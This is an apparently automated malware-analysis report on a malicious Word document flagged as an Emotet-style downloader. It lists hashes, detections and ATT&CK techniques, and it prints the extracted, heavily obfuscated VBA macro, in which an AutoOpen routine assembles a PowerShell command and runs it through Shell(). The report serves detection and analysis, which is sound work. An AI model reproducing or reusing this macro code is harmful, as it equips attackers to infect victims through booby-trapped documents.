Office (OLE) malware analysis — malicious · 3258a9446ccd087d

MALICIOUS

Office (OLE)

239.0 KB Created: 2018-06-29 13:46:00 Authoring application: Microsoft Office Word First seen: 2019-06-27

MD5: 2509c09342b087fda79b83457c298046 SHA-1: bfd105b82c2a151076097baf641e5e6a8c7de7fe SHA-256: 3258a9446ccd087d99adfa9b585da8a53b9df71a04fcb6213fd202c462a71d4f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes a Shell() call, indicating an attempt to execute a secondary payload. The ClamAV detection name 'Doc.Malware.Emodldr-6883773-0' further supports its malicious nature. The VBA code is heavily obfuscated, but the presence of the Shell() function and AutoOpen macro strongly suggests a downloader or dropper functionality.

Heuristics 7

ClamAV: Doc.Malware.Emodldr-6883773-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-6883773-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11479 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11479 bytes
SHA-256: `9a95d8bd40fb66f33e28f2a740c7a0d0d9841885016d846dee11b0aceb2ba7eb`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zEjRVNYjFqRs" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "IqTuzLGEJjJuh" Function AjaMtlsCjw() On Error Resume Next QtGvYo = SzROX - amiuv / (sAQBjw + Oct(iuoiqX) - 61976 + Log(fNqtN)) ZLRadj = FLjGnM = 75807 / EsETL + 1609 / ChrW(61316) / JcotO + ChrW(TwsAQ) * 18511 + ChrB(42680 * CInt(fjhzns) * 157 - Hex(WsUZF)) + wbltu - Int(HzomXv) * (jOmwdr - MUlNM) iUodFfwYQwY = dFNNrAur + Chr(FnlGvsiJvU + vbKeyP + vlAztowimH) + "owe" + "rs" oTPbHf = OCZIBQ - fKjfp / (vVYfr + Oct(sGJjHR) - 50606 + Log(tbDuYC)) rZmwXZ = QYdZq = 76629 / nzrXz + 65488 / ChrW(12643) / iTbrr + ChrW(uYsBh) * 84197 + ChrB(1786 * CInt(dFLXcR) * 41656 - Hex(EzjLS)) + VStfbh - Int(SVjhFW) * (lYIwT - WmLcF) nrNil = WmdBY - luSrDF / (utQAd + Oct(ljwBK) - 86653 + Log(SvpDL)) HzMPH = AhLDjn = 65235 / SujjTn + 69537 / ChrW(10131) / Srbda + ChrW(HoGmI) * 76253 + ChrB(46807 * CInt(QjHrY) * 96544 - Hex(aissaj)) + KFOiC - Int(uYjCZi) * (PaAZG - iTAMvL) AjaMtlsCjw = tbIwGjYBCmG + iUodFfwYQwY + wchFsMEZj + UdJifOZIjBI + AQNqE MEVOJI = CEYWnE - KKiomk / (iWTFXz + Oct(wuqiR) - 85224 + Log(OvIaW)) RZHRmZ = vVzQbw = 13217 / RNXqjP + 99214 / ChrW(38446) / lSHEL + ChrW(EOjFos) * 75063 + ChrB(54434 * CInt(bBYQjh) * 49078 - Hex(mqBhS)) + bhRFi - Int(TRXjiv) * (vqSki - tPhrin) End Function Sub AutoOpen() On Error Resume Next CGdqOV = aFjpF - PfiwC / (KwFoG + Oct(DOzzHX) - 56815 + Log(qFWkW)) wrSwz = ojFCDw = 5310 / hhCIm + 22204 / ChrW(25909) / JhnVL + ChrW(vOVOQb) * 65385 + ChrB(75221 * CInt(XIwIp) * 82910 - Hex(nlPimj)) + AnKvsh - Int(IcOMnq) * (ojabud - ApDXOS) Application.Run "YjDWK", AjaMtlsCjw rmzGz = iAEjDP - IwBIt / (KrThT + Oct(iwipj) - 21216 + Log(uEwwii)) VLObu = oKPUHG = 41937 / HwzRW + 97982 / ChrW(22138) / VdwIL + ChrW(cJJzad) * 58969 + ChrB(97402 * CInt(itUCsw) * 58814 - Hex(ABOHuI)) + NXNOp - Int(clawiG) * (JjskI - SXCwT) End Sub Function YjDWK(SOUdnjsFPT) On Error Resume Next lGXukY = GVwFKJ - dHoYDI / (cfJim + Oct(OvMPC) - 86782 + Log(KcdGX)) PAGGZd = TANRPJ = 85442 / RYFiz + 35939 / ChrW(69787) / KYYcVL + ChrW(AWdQo) * 19257 + ChrB(71419 * CInt(HpjKw) * 40092 - Hex(RBiln)) + tAhKiA - Int(iABHHq) * (vlsDw - LzoRHl) GzKEBq = AOqbBP - mimIw / (BsuiM + Oct(bvRXMZ) - 30795 + Log(oTzfbJ)) GGZpmt = rhqzsE = 56834 / JaOPz + 33572 / ChrW(39559) / JhCQo + ChrW(BdhATB) * 2250 + ChrB(6069 * CInt(WlzPhF) * 23814 - Hex(wPzBB)) + qZSmv - Int(IjcAM) * (MSrlcW - jriAC) JwwlzluSzof = RqRovUsb + Shell(nbEBREw + SOUdnjsFPT + aBTOm, 985845084 - 985845084) + YMBUdaLorMd ojVDq = TTUsR - mWwid / (cASBD + Oct(wGhAYZ) - 81397 + Log(diIidt)) fwbQjN = TBFVE = 99392 / NCfrNP + 65196 / ChrW(67218) / iBlQRT + ChrW(HhmSVt) * 36688 + ChrB(26643 * CInt(aLcQRq) * 40992 - Hex(MaQSn)) + uBwHw - Int(wwzzQ) * (oRjQUj - OnEFS) End Function Function wchFsMEZj() On Error Resume Next kzHvMi = FmVZIa - BzaRC / (TOvGaO + Oct(flohUV) - 933 + Log(TXVDT)) jzljZ = MYXnq = 3266 / fMVjp + 38574 / ChrW(76684) / PVTSW + ChrW(bEBfuK) * 5016 + ChrB(35134 * CInt(siEEEi) * 34382 - Hex(XFosV)) + fGljq - Int(iRQCi) * (UWHwrK - kdwlP) MwrnwiX = "hell" + " " + Chr(40) + " '1" + "1d78T8" + "5,11" + "7<18d" + "65X7" + "4u88" + "X2m64u77" + "u69!74" + "T76m91!1" SFpWRD = HTldw - zlInpn / (hnWIuK + Oct(SGqKpY) - 47059 + Log(vzWMI)) fhAhoQ = LmDjip = 30404 / CAUwE + 4929 / ChrW(39072) / oFmaFi + ChrW(ENiioj) * 91085 + ChrB(48860 * CInt(wfTwlA) * 74187 - Hex(kjRWBF)) + tLkMc - Int(psdLw) * (zKbpG - izYiVM) oiikXQ = "5S97m74" + ",91<1m120" + "z74m77X" + "108m67S70" + "T74," + "65z91T20" + "X11S85u9" + "6d100" + ",18X8!" + "71d9" JfZsI = pWXifM - AzfZb / (ikCDP + Oct(GawTlK) - 93575 + Log(cofvU)) LfYwtX = wqlsiZ = 12754 / jjbGHk + 2926 / ChrW(57100) / nYKnpI + ChrW(diqVH) * 95616 + ChrB(19874 * CInt(mSVPE) * 33843 - Hex(wRiMT)) + FALJBz - Int(VNqHh) * (PDikX - WaUpOl) Kczzvikirw = "1<91S9" + "5,21m" + "0<0<88d" + "88T88" + "u1m76S93<" + " ... (truncated)

SHA-256: 9a95d8bd40fb66f33e28f2a740c7a0d0d9841885016d846dee11b0aceb2ba7eb

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zEjRVNYjFqRs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IqTuzLGEJjJuh"
Function AjaMtlsCjw()
On Error Resume Next
QtGvYo = SzROX - amiuv / (sAQBjw + Oct(iuoiqX) - 61976 + Log(fNqtN))
ZLRadj = FLjGnM = 75807 / EsETL + 1609 / ChrW(61316) / JcotO + ChrW(TwsAQ) * 18511 + ChrB(42680 * CInt(fjhzns) * 157 - Hex(WsUZF)) + wbltu - Int(HzomXv) * (jOmwdr - MUlNM)
iUodFfwYQwY = dFNNrAur + Chr(FnlGvsiJvU + vbKeyP + vlAztowimH) + "owe" + "rs"
oTPbHf = OCZIBQ - fKjfp / (vVYfr + Oct(sGJjHR) - 50606 + Log(tbDuYC))
rZmwXZ = QYdZq = 76629 / nzrXz + 65488 / ChrW(12643) / iTbrr + ChrW(uYsBh) * 84197 + ChrB(1786 * CInt(dFLXcR) * 41656 - Hex(EzjLS)) + VStfbh - Int(SVjhFW) * (lYIwT - WmLcF)
nrNil = WmdBY - luSrDF / (utQAd + Oct(ljwBK) - 86653 + Log(SvpDL))
HzMPH = AhLDjn = 65235 / SujjTn + 69537 / ChrW(10131) / Srbda + ChrW(HoGmI) * 76253 + ChrB(46807 * CInt(QjHrY) * 96544 - Hex(aissaj)) + KFOiC - Int(uYjCZi) * (PaAZG - iTAMvL)
AjaMtlsCjw = tbIwGjYBCmG + iUodFfwYQwY + wchFsMEZj + UdJifOZIjBI + AQNqE
MEVOJI = CEYWnE - KKiomk / (iWTFXz + Oct(wuqiR) - 85224 + Log(OvIaW))
RZHRmZ = vVzQbw = 13217 / RNXqjP + 99214 / ChrW(38446) / lSHEL + ChrW(EOjFos) * 75063 + ChrB(54434 * CInt(bBYQjh) * 49078 - Hex(mqBhS)) + bhRFi - Int(TRXjiv) * (vqSki - tPhrin)
End Function
Sub AutoOpen()
On Error Resume Next
CGdqOV = aFjpF - PfiwC / (KwFoG + Oct(DOzzHX) - 56815 + Log(qFWkW))
wrSwz = ojFCDw = 5310 / hhCIm + 22204 / ChrW(25909) / JhnVL + ChrW(vOVOQb) * 65385 + ChrB(75221 * CInt(XIwIp) * 82910 - Hex(nlPimj)) + AnKvsh - Int(IcOMnq) * (ojabud - ApDXOS)
Application.Run "YjDWK", AjaMtlsCjw
rmzGz = iAEjDP - IwBIt / (KrThT + Oct(iwipj) - 21216 + Log(uEwwii))
VLObu = oKPUHG = 41937 / HwzRW + 97982 / ChrW(22138) / VdwIL + ChrW(cJJzad) * 58969 + ChrB(97402 * CInt(itUCsw) * 58814 - Hex(ABOHuI)) + NXNOp - Int(clawiG) * (JjskI - SXCwT)
End Sub
Function YjDWK(SOUdnjsFPT)
On Error Resume Next
lGXukY = GVwFKJ - dHoYDI / (cfJim + Oct(OvMPC) - 86782 + Log(KcdGX))
PAGGZd = TANRPJ = 85442 / RYFiz + 35939 / ChrW(69787) / KYYcVL + ChrW(AWdQo) * 19257 + ChrB(71419 * CInt(HpjKw) * 40092 - Hex(RBiln)) + tAhKiA - Int(iABHHq) * (vlsDw - LzoRHl)
GzKEBq = AOqbBP - mimIw / (BsuiM + Oct(bvRXMZ) - 30795 + Log(oTzfbJ))
GGZpmt = rhqzsE = 56834 / JaOPz + 33572 / ChrW(39559) / JhCQo + ChrW(BdhATB) * 2250 + ChrB(6069 * CInt(WlzPhF) * 23814 - Hex(wPzBB)) + qZSmv - Int(IjcAM) * (MSrlcW - jriAC)
JwwlzluSzof = RqRovUsb + Shell(nbEBREw + SOUdnjsFPT + aBTOm, 985845084 - 985845084) + YMBUdaLorMd
ojVDq = TTUsR - mWwid / (cASBD + Oct(wGhAYZ) - 81397 + Log(diIidt))
fwbQjN = TBFVE = 99392 / NCfrNP + 65196 / ChrW(67218) / iBlQRT + ChrW(HhmSVt) * 36688 + ChrB(26643 * CInt(aLcQRq) * 40992 - Hex(MaQSn)) + uBwHw - Int(wwzzQ) * (oRjQUj - OnEFS)
End Function

Function wchFsMEZj()
On Error Resume Next
kzHvMi = FmVZIa - BzaRC / (TOvGaO + Oct(flohUV) - 933 + Log(TXVDT))
jzljZ = MYXnq = 3266 / fMVjp + 38574 / ChrW(76684) / PVTSW + ChrW(bEBfuK) * 5016 + ChrB(35134 * CInt(siEEEi) * 34382 - Hex(XFosV)) + fGljq - Int(iRQCi) * (UWHwrK - kdwlP)
MwrnwiX = "hell" + "  " + Chr(40) + " '1" + "1d78T8" + "5,11" + "7<18d" + "65X7" + "4u88" + "X2m64u77" + "u69!74" + "T76m91!1"
SFpWRD = HTldw - zlInpn / (hnWIuK + Oct(SGqKpY) - 47059 + Log(vzWMI))
fhAhoQ = LmDjip = 30404 / CAUwE + 4929 / ChrW(39072) / oFmaFi + ChrW(ENiioj) * 91085 + ChrB(48860 * CInt(wfTwlA) * 74187 - Hex(kjRWBF)) + tLkMc - Int(psdLw) * (zKbpG - izYiVM)
oiikXQ = "5S97m74" + ",91<1m120" + "z74m77X" + "108m67S70" + "T74," + "65z91T20" + "X11S85u9" + "6d100" + ",18X8!" + "71d9"
JfZsI = pWXifM - AzfZb / (ikCDP + Oct(GawTlK) - 93575 + Log(cofvU))
LfYwtX = wqlsiZ = 12754 / jjbGHk + 2926 / ChrW(57100) / nYKnpI + ChrW(diqVH) * 95616 + ChrB(19874 * CInt(mSVPE) * 33843 - Hex(wRiMT)) + FALJBz - Int(VNqHh) * (PDikX - WaUpOl)
Kczzvikirw = "1<91S9" + "5,21m" + "0<0<88d" + "88T88" + "u1m76S93<" + "
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.